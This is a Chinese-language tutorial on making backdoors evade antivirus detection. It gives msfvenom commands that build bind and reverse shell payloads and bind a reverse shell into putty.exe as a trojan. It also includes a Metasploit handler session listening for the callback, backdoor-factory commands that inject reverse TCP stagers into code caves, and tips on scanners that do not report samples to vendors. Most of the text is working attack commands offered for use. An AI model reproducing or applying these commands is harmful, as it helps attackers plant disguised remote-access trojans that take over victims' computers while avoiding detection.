免殺技術

與防病毒廠商共享信息

VirusTotal

  https://www.virustotal.com/zh-cn

VirScan

  https://virscan.org

黑產在線查殺引擎

  https://nodistribute.com

  http://viruscheckmate.com掃描網站安全性

  http://onlinelinkscan.com

 

使用msf編碼模塊生成後門

  msfvenom -p windows/shell/bind_tcp LPORT=444 -f exe -o a.exe       21個廠商報毒

  增長編碼模塊

  msfvenom -a x86 -p windows/shell/bind_tcp LPORT=444 -e cmd/powershell_base64 -i 9 -f exe -o b.exe  20個廠商報毒

   使用編碼後效果並不明顯，仍是不少廠商報毒

 

使用模板程序隱藏後門，效果比較好

  msfvenom -p windows/shell/reverse_tcp lhost=192.168.137.128 lport=444 -x putty.exe -f exe -o c.exe

  將後門綁定到putty中，這裏用的是反彈shell 注意參數lhost地址填寫的是攻擊者的IP地址，綁定後putty會報廢，若是不想破壞使用 -k 參數

  msfvenom -p windows/shell/reverse_tcp lhost=192.168.137.128 lport=444 -x putty.exe -k -f exe -o d.exe

  8個廠商報毒

 

+

payload: 在目標系統執行的代碼或指令，使得獲取shell

shellcode : 獲取shell的code

 

 

shell             後門程序

reverser_tcp 反彈shell

bind_tcp      正向shell

meterpreter 更高級的shell，集成了不少腳本，更容易使用

 【meterpreter命令】

    getuid 當前用戶信息

    getsystem 提權

    help 查看幫助

    screenshot

 

 

由於msf知名度太大了，作出的免殺指紋早已被殺毒廠商收錄了

 

kali存放着windows下的執行程序目錄

/usr/share/windows-binaries/

 

shellter 每次生成的後門程序代碼都不一樣，動態變化的特徵，難以用指紋匹配

 

後門利用

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.137.128
lhost => 192.168.137.128
msf exploit(multi/handler) > set lport 444
lport => 444
msf exploit(multi/handler) >

msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.137.128  yes       The listen address
   LPORT     444              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.137.128:444

 

 

亂碼將終端編碼改爲 gbk 或者 gb2312

shllter

veil-framework

 

backdoor生成的後門曾經很騷，沒有一個殺軟報毒，在黑帽大會秀了一波，如今不行了，不推薦使用

backdoor-factory 利用代碼洞注入後門，不改變體積 code cave

backdoor-factory -f putty.exe -S　　　　　　檢查是否支持注入後門

backdoor-factory -f putty.exe -c -l 100　　　　檢查大於100字節的代碼洞數量

backdoor-factory -f putty.exe -s show　　　　查看哪些payload能夠用

 

普通注入模式（體積會變大，直接在程序後面加代碼）

backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -a

 

大小對比

 

單代碼洞注入（體積不會變，須要選擇代碼洞）

backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -a

最好選擇代碼洞比較大的，不然容易致使溢出，因此這裏選擇1，這裏大小反而變小了，理論上應該不變的

 

使用的時候360殺軟報毒了。在線監測有23個廠商報毒，效果不怎樣，0day似的

 

多代碼洞注入模式

backdoor-factory -f putty_no.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -J

要選屢次代碼洞，儘可能選大的，否則要選不少次

 

利用：

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LPORT 444

set LHOST 192.168.137.129